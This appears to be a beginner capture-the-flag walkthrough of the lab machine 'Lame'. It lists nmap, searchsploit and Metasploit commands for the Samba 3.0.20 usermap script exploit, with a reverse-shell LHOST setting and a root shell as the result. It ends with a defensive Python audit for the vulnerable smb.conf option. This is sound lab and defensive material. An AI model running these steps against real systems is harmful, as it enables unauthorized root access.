- MACHINE — LAME
- IP — 10.10.10.3
- OS — Linux-based
This machine is useful for practicing basic Metasploit skills, and it gives a beginner hands-on experience with the simple steps of launching an exploit against a vulnerable machine.
1. First, I started with nmap to enumerate the target.
sudo nmap -sT -sV -O -A --version-light 10.10.10.3
- -sT = TCP connect() scan
- -sV = Probe open ports to determine service/version info
- -O = Enable OS detection
- -A = Enable OS detection, version detection, script scanning, and traceroute
- --version-light = Limit to most likely probes (intensity 2)
After nmap completes, you will have a rough idea of the target and which ports are open and closed. On ‘Lame’, I found Samba 3.0.20, a vulnerable version of the software that implements SMB (Server Message Block), the network protocol used for data sharing and Active Directory integration.
2. Internet search
As the second step, I tried to connect with File Transfer Protocol (FTP) through the internet. I found that there is an FTP server which auto-generates directories when clicking “Up to higher level directory”.
3. Trying to connect with ftp on terminal
As the third step, I blind-tested connecting to FTP through the terminal and tried several default usernames and passwords, but I could not gain access despite several attempts.
4. Searching exploits
As the fourth step, I searched for a Samba 3.0.20 exploit in the searchsploit database to find a suitable module.
searchsploit Samba 3.0.20
I found that unix/remote/16320.rb is in the Metasploit database.
What is Metasploit?
Simply put, Metasploit is a framework that ships a database of exploit modules for previously disclosed vulnerabilities. It is a free tool for Linux users, and you can also find exploits online at Rapid7, Exploit Database, CVE (Common Vulnerabilities and Exposures), and many more.
5. Using Metasploit
I opened Metasploit using the command “msfconsole”.
6. Search for the exploit in the msf database
Following the searchsploit result, I searched for the specific module using the command
- search Samba 3.0.20
7. Use module
I used the exploit for the usermap script.
8. Configure exploit according to the target
After selecting the module, we need to configure the exploit for the target environment. So, I used the following commands to configure the remote host and the local host.
- show options (to see the configured options)
- set RHOST 10.10.10.3
- set LHOST 10.10.14.58 (callback address of the local host, tun0)
9. Once the exploit is configured, it is ready to run.
10. Gaining access to the server.
To check which operating system is running on the target, I typed the command “whoami”. As a result I got “root”. Because the host runs a Linux kernel, I used Linux commands to list all directories and got the user.txt file.
The user flag is found in the user.txt file.
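On the defender's side, the usermap script exploit used in step 7 only works when Samba's non-default `username map script` option is set in smb.conf. The following Python audit is an added example, not part of the original write-up; the sample configuration, script path and function names are constructed for illustration.

```python
import re

# Constructed sample smb.conf (not taken from the target in this write-up).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/true
   User Name MAP Script = /etc/samba/scripts/\\
mapusers.sh
   security = user

[tmp]
   path = /tmp
   read only = no
"""

def normalize(name):
    """smb.conf names ignore case and all whitespace, so fold both."""
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    """Return {section: {parameter: value}} with normalized names."""
    joined = text.replace("\\\n", "")  # a trailing backslash continues the line
    sections, current = {}, None
    for raw in joined.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = normalize(line[1:-1])
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            name, value = line.split("=", 1)  # only the first '=' separates
            sections[current][normalize(name)] = value.strip()
    return sections

def audit_username_map_script(text):
    """List (section, script) pairs where 'username map script' is set."""
    return [(section, params["usernamemapscript"])
            for section, params in parse_smb_conf(text).items()
            if params.get("usernamemapscript")]

if __name__ == "__main__":
    for section, script in audit_username_map_script(SAMPLE_SMB_CONF):
        print(f"[{section}] username map script = {script}: review or remove")
```

Because the parser folds case and whitespace in parameter names, spellings such as `User Name MAP Script` or `usernamemapscript` are caught along with the canonical form.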
SEE YOU IN THE NEXT MACHINE……….